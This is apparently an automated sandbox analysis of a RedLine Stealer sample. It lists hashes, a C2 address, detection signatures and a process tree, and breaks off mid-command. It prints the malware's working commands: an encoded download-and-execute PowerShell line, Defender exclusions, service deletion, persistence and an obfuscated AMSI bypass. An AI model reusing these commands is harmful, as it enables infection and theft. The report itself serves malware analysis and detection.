Analysis
-
max time kernel
52s -
max time network
76s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
06-01-2023 07:04
Static task
static1
Behavioral task
behavioral1
Sample
8aae493caafa6e42a5a7afe431aeac120ce4c152.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
8aae493caafa6e42a5a7afe431aeac120ce4c152.exe
Resource
win10v2004-20221111-en
General
-
Target
8aae493caafa6e42a5a7afe431aeac120ce4c152.exe
-
Size
197KB
-
MD5
78e69dd4d4eb058e9a2de5c4082c3133
-
SHA1
8aae493caafa6e42a5a7afe431aeac120ce4c152
-
SHA256
d3527f53eea79b90e0ea31e8c07a47924bdc0ed0dbaf635df7bb51fd580c91db
-
SHA512
42e6b6950f6ce3b21d107acffe1c68c19193ad6f54538caad9fc84d0d143ee6e753cfb4c64f96ef2fb22ef7c1049cf1496a94382d2166ff67312f6cad1444777
-
SSDEEP
6144:vmrFp1Uv1cVoar1HqOAORbMCIqxb/cTkc:vGFpv3vvbPb/cX
Malware Config
Extracted
redline
1
107.182.129.73:21733
-
auth_value
3a5bb0917495b4312d052a0b8977d2bb
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/3548-172-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 3580 created 1192 3580 SmartDefRun.exe 16 PID 3580 created 1192 3580 SmartDefRun.exe 16 PID 3580 created 1192 3580 SmartDefRun.exe 16 -
Blocklisted process makes network request 2 IoCs
flow pid Process 4 3232 powershell.exe 16 3232 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe -
Executes dropped EXE 3 IoCs
pid Process 1400 new2.exe 3652 SysApp.exe 3580 SmartDefRun.exe -
Stops running service(s) 3 TTPs
-
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2800 set thread context of 2652 2800 8aae493caafa6e42a5a7afe431aeac120ce4c152.exe 81 PID 1400 set thread context of 3548 1400 new2.exe 92 -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3404 sc.exe 3460 sc.exe 3508 sc.exe 1300 sc.exe 1988 sc.exe -
Program crash 2 IoCs
pid pid_target Process procid_target 1312 2800 WerFault.exe 79 2296 1400 WerFault.exe 87 -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 3232 powershell.exe 3232 powershell.exe 3652 SysApp.exe 3652 SysApp.exe 3652 SysApp.exe 3652 SysApp.exe 3652 SysApp.exe 3652 SysApp.exe 3652 SysApp.exe 3652 SysApp.exe 3652 SysApp.exe 3652 SysApp.exe 3580 SmartDefRun.exe 3580 SmartDefRun.exe 3852 powershell.exe 3852 powershell.exe 3580 SmartDefRun.exe 3580 SmartDefRun.exe 3580 SmartDefRun.exe 3580 SmartDefRun.exe 1048 powershell.exe 1048 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 3232 powershell.exe Token: SeDebugPrivilege 3852 powershell.exe Token: SeDebugPrivilege 1048 powershell.exe Token: SeIncreaseQuotaPrivilege 1048 powershell.exe Token: SeSecurityPrivilege 1048 powershell.exe Token: SeTakeOwnershipPrivilege 1048 powershell.exe Token: SeLoadDriverPrivilege 1048 powershell.exe Token: SeSystemProfilePrivilege 1048 powershell.exe Token: SeSystemtimePrivilege 1048 powershell.exe Token: SeProfSingleProcessPrivilege 1048 powershell.exe Token: SeIncBasePriorityPrivilege 1048 powershell.exe Token: SeCreatePagefilePrivilege 1048 powershell.exe Token: SeBackupPrivilege 1048 powershell.exe Token: SeRestorePrivilege 1048 powershell.exe Token: SeShutdownPrivilege 1048 powershell.exe Token: SeDebugPrivilege 1048 powershell.exe Token: SeSystemEnvironmentPrivilege 1048 powershell.exe Token: SeRemoteShutdownPrivilege 1048 powershell.exe Token: SeUndockPrivilege 1048 powershell.exe Token: SeManageVolumePrivilege 1048 powershell.exe Token: 33 1048 powershell.exe Token: 34 1048 powershell.exe Token: 35 1048 powershell.exe Token: 36 1048 powershell.exe Token: SeIncreaseQuotaPrivilege 1048 powershell.exe Token: SeSecurityPrivilege 1048 powershell.exe Token: SeTakeOwnershipPrivilege 1048 powershell.exe Token: SeLoadDriverPrivilege 1048 powershell.exe Token: SeSystemProfilePrivilege 1048 powershell.exe Token: SeSystemtimePrivilege 1048 powershell.exe Token: SeProfSingleProcessPrivilege 1048 powershell.exe Token: SeIncBasePriorityPrivilege 1048 powershell.exe Token: SeCreatePagefilePrivilege 1048 powershell.exe Token: SeBackupPrivilege 1048 powershell.exe Token: SeRestorePrivilege 1048 powershell.exe Token: SeShutdownPrivilege 1048 powershell.exe Token: SeDebugPrivilege 1048 powershell.exe Token: SeSystemEnvironmentPrivilege 1048 powershell.exe Token: SeRemoteShutdownPrivilege 1048 powershell.exe Token: SeUndockPrivilege 1048 powershell.exe Token: SeManageVolumePrivilege 1048 powershell.exe Token: 33 1048 powershell.exe Token: 34 1048 powershell.exe Token: 35 1048 powershell.exe Token: 36 1048 powershell.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 2800 wrote to memory of 2652 2800 8aae493caafa6e42a5a7afe431aeac120ce4c152.exe 81 PID 2800 wrote to memory of 2652 2800 8aae493caafa6e42a5a7afe431aeac120ce4c152.exe 81 PID 2800 wrote to memory of 2652 2800 8aae493caafa6e42a5a7afe431aeac120ce4c152.exe 81 PID 2800 wrote to memory of 2652 2800 8aae493caafa6e42a5a7afe431aeac120ce4c152.exe 81 PID 2800 wrote to memory of 2652 2800 8aae493caafa6e42a5a7afe431aeac120ce4c152.exe 81 PID 2652 wrote to memory of 3232 2652 vbc.exe 84 PID 2652 wrote to memory of 3232 2652 vbc.exe 84 PID 2652 wrote to memory of 3232 2652 vbc.exe 84 PID 3232 wrote to memory of 1400 3232 powershell.exe 87 PID 3232 wrote to memory of 1400 3232 powershell.exe 87 PID 3232 wrote to memory of 1400 3232 powershell.exe 87 PID 3232 wrote to memory of 3652 3232 powershell.exe 88 PID 3232 wrote to memory of 3652 3232 powershell.exe 88 PID 3232 wrote to memory of 3652 3232 powershell.exe 88 PID 3232 wrote to memory of 3580 3232 powershell.exe 89 PID 3232 wrote to memory of 3580 3232 powershell.exe 89 PID 1400 wrote to memory of 3548 1400 new2.exe 92 PID 1400 wrote to memory of 3548 1400 new2.exe 92 PID 1400 wrote to memory of 3548 1400 new2.exe 92 PID 1400 wrote to memory of 3548 1400 new2.exe 92 PID 1400 wrote to memory of 3548 1400 new2.exe 92 PID 4560 wrote to memory of 3404 4560 cmd.exe 99 PID 4560 wrote to memory of 3404 4560 cmd.exe 99 PID 4560 wrote to memory of 3460 4560 cmd.exe 100 PID 4560 wrote to memory of 3460 4560 cmd.exe 100 PID 4560 wrote to memory of 3508 4560 cmd.exe 101 PID 4560 wrote to memory of 3508 4560 cmd.exe 101 PID 4560 wrote to memory of 1300 4560 cmd.exe 102 PID 4560 wrote to memory of 1300 4560 cmd.exe 102 PID 4560 wrote to memory of 1988 4560 cmd.exe 103 PID 4560 wrote to memory of 1988 4560 cmd.exe 103 PID 4560 wrote to memory of 3680 4560 cmd.exe 104 PID 4560 wrote to memory of 3680 4560 cmd.exe 104 PID 4560 wrote to memory of 4424 4560 cmd.exe 105 PID 4560 wrote to memory of 4424 4560 cmd.exe 105 PID 4560 wrote to memory of 3224 4560 cmd.exe 106 PID 4560 wrote to memory of 3224 4560 cmd.exe 106 PID 4560 wrote to memory of 4696 4560 cmd.exe 107 PID 4560 wrote to memory of 4696 4560 cmd.exe 107 PID 4560 wrote to memory of 376 4560 cmd.exe 108 PID 4560 wrote to memory of 376 4560 cmd.exe 108
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1192
-
C:\Users\Admin\AppData\Local\Temp\8aae493caafa6e42a5a7afe431aeac120ce4c152.exe"C:\Users\Admin\AppData\Local\Temp\8aae493caafa6e42a5a7afe431aeac120ce4c152.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵PID:3548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 4926⤵
- Program crash
PID:2296
-
-
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3652
-
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3580
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 2403⤵
- Program crash
PID:1312
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3404
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3460
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3508
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1300
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1988
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:3680
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4424
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:3224
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4696
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:376
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:1264
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2800 -ip 28001⤵PID:2644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1400 -ip 14001⤵PID:1188
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:SeDxSJmXFniv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WhTHHMzXejaQMc,[Parameter(Position=1)][Type]$iijSWnwGVJ)$qlmDGjyNDGa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+[Char](108)+''+[Char](101)+'ct'+[Char](101)+''+'d'+'De'+'l'+''+[Char](101)+''+'g'+''+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+'a'+[Char](116)+'eT'+[Char](121)+'p'+'e'+'',''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+'Cl'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$qlmDGjyNDGa.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+'a'+''+[Char](109)+'e'+[Char](44)+''+'H'+''+[Char](105)+'d'+[Char](101)+''+'B'+''+[Char](121)+'Si'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$WhTHHMzXejaQMc).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+'a'+[Char](103)+'e'+'d'+'');$qlmDGjyNDGa.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+'u'+'b'+'li'+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'i'+'g'+','+'N'+''+[Char](101)+''+'w'+''+[Char](83)+'lo'+[Char](116)+','+'V'+'ir'+[Char](116)+''+'u'+'al',$iijSWnwGVJ,$WhTHHMzXejaQMc).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'a'+[Char](103)+''+'e'+''+'d'+'');Write-Output $qlmDGjyNDGa.CreateType();}$QdkJMeNrQXCRA=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+'e'+''+'m'+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+'2.'+[Char](85)+''+[Char](110)+''+[Char](115)+'a'+'f'+''+[Char](101)+''+[Char](81)+''+[Char](100)+''+[Char](107)+''+[Char](74)+''+[Char](77)+'e'+[Char](78)+''+[Char](114)+''+[Char](81)+''+'X'+''+'C'+''+'R'+'A');$xEjKgCXDFfUyls=$QdkJMeNrQXCRA.GetMethod('x'+'E'+''+[Char](106)+''+'K'+''+[Char](103)+'CX'+'D'+''+[Char](70)+''+[Char](102)+'U'+[Char](121)+''+[Char](108)+''+[Char](115)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+''+','+'S'+'t'+''+'a'+''+[Char](116)+''+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MbMscOvhLbVuCzLcXNy=SeDxSJmXFniv @([String])([IntPtr]);$oadMUaxWtbqUTSzJQKpsge=SeDxSJmXFniv @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$oTcwRdopyBQ=$QdkJMeNrQXCRA.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+'l'+'e'+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+'le').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+''+[Char](101)+'l'+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$CyEPnMAzbQTqwm=$xEjKgCXDFfUyls.Invoke($Null,@([Object]$oTcwRdopyBQ,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+'r'+'y'+[Char](65)+'')));$FvlDpQFfdcsfHpSQa=$xEjKgCXDFfUyls.Invoke($Null,@([Object]$oTcwRdopyBQ,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+'al'+[Char](80)+''+[Char](114)+''+'o'+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$LWHSrwK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CyEPnMAzbQTqwm,$MbMscOvhLbVuCzLcXNy).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+'dl'+[Char](108)+'');$RVRJBuADEEdDOZTqL=$xEjKgCXDFfUyls.Invoke($Null,@([Object]$LWHSrwK,[Object](''+[Char](65)+''+'m'+'si'+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$RaxTmighww=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FvlDpQFfdcsfHpSQa,$oadMUaxWtbqUTSzJQKpsge).Invoke($RVRJBuADEEdDOZTqL,[uint32]8,4,[ref]$RaxTmighww);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$RVRJBuADEEdDOZTqL,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FvlDpQFfdcsfHpSQa,$oadMUaxWtbqUTSzJQKpsge).Invoke($RVRJBuADEEdDOZTqL,[uint32]8,0x20,[ref]$RaxTmighww);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue('d'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+'ger')).EntryPoint.Invoke($Null,$Null)1⤵PID:444
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UvslYTqssbKO{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XrFhyxGLyheZPe,[Parameter(Position=1)][Type]$SlFMXGvVjc)$MCdXXgRFQAU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 